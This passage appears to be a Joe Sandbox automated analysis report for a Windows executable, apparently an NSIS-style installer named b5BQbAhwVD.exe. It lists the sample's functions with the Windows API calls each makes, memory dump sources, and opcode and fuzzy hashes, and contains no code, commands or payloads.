Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E

Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634

Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4

Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FD5C,0040CED0,004033DE,0040CED0,0040FD5C,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8

Function 72ED2993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(72ED505C,00000004,00000040,72ED504C), ref: 72ED29B1

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f81d1c17841296c0789f0ca376589db12b515687a977e2db9af95ac9f138a026
Instruction ID: 8b532e54303cff67a00e10f5740efb0f8cb818109a30cf591f5556c52867b020
Opcode Fuzzy Hash: f81d1c17841296c0789f0ca376589db12b515687a977e2db9af95ac9f138a026
Instruction Fuzzy Hash: 2BF0AEBAA80281DFD351CF2AA8447193BE8B719305BE08E6EE288DA241E33444C5DB91

Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14

Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Function 72ED121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,72ED123B,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED1225

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 7d5a07d747e45d972ecd7faca3109f0664a67763ae2306e23233f1d0b1367a79
Instruction ID: c4222cd2a7ace80280a08f3ebd8bc69f0726e7a33d5b652a953f092a5dcb506f
Opcode Fuzzy Hash: 7d5a07d747e45d972ecd7faca3109f0664a67763ae2306e23233f1d0b1367a79
Instruction Fuzzy Hash: 4EB01276A80000DFEF009B65DD46F34325CE700301FD44444F600C0180C12048408A35

Non-executed Functions

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

(7B, xrefs: 0040587D
{, xrefs: 004057F5

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00404850 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,Call), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

Call, xrefs: 004049B1, 004049B6, 004049C1
A, xrefs: 00404973
C:\Users\user\AppData\Local\Iw, xrefs: 004049A0
(7B, xrefs: 0040494D

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$C:\Users\user\AppData\Local\Iw$Call
API String ID: 2624150263-819140515
Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 72ED1B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 72ED121B: GlobalAlloc.KERNELBASE(00000040,?,72ED123B,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED1225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 72ED1C6B
lstrcpyW.KERNEL32(00000008,?), ref: 72ED1CB3
lstrcpyW.KERNEL32(00000808,?), ref: 72ED1CBD
GlobalFree.KERNEL32(00000000), ref: 72ED1CD0
GlobalFree.KERNEL32(?), ref: 72ED1DB2
GlobalFree.KERNEL32(?), ref: 72ED1DB7
GlobalFree.KERNEL32(?), ref: 72ED1DBC
GlobalFree.KERNEL32(00000000), ref: 72ED1FA6
lstrcpyW.KERNEL32(?,?), ref: 72ED2140
GetModuleHandleW.KERNEL32(00000008), ref: 72ED21B5
LoadLibraryW.KERNEL32(00000008), ref: 72ED21C6
GetProcAddress.KERNEL32(?,?), ref: 72ED2220
lstrlenW.KERNEL32(00000808), ref: 72ED223A

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: dfa2eb3cb59eb63eeb4df86968e9e8687bf6cca2672b5e2e279399cf23d9aa0f
Instruction ID: 22b524e4698a7c3d18bf1479a857ef78d1f66dbc36d1c575436bfc0c02540750
Opcode Fuzzy Hash: dfa2eb3cb59eb63eeb4df86968e9e8687bf6cca2672b5e2e279399cf23d9aa0f
Instruction Fuzzy Hash: 47227A71D04206DBCB158FB8C9847EEBBB5FF05309F50D52EE1A6EA184D7B05A82CB50

Function 00406831 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00406851
GetProcAddress.KERNEL32(?,?), ref: 00406865

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID:
API String ID: 2508298434-0
Opcode ID: c37da8da378c18353bec7fc648a57738bb32c6c86a1d9b06a84ce83886780411
Instruction ID: e5ebb041b93c27b5bb64d203231611adad9cd2ad275d9b301639073104c6c5cb
Opcode Fuzzy Hash: c37da8da378c18353bec7fc648a57738bb32c6c86a1d9b06a84ce83886780411
Instruction Fuzzy Hash: C4E08672100104BEEB026F71DD09FF7376CEB14310F1086757992E01D0EAB4DE54CA68

Function 00402104 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

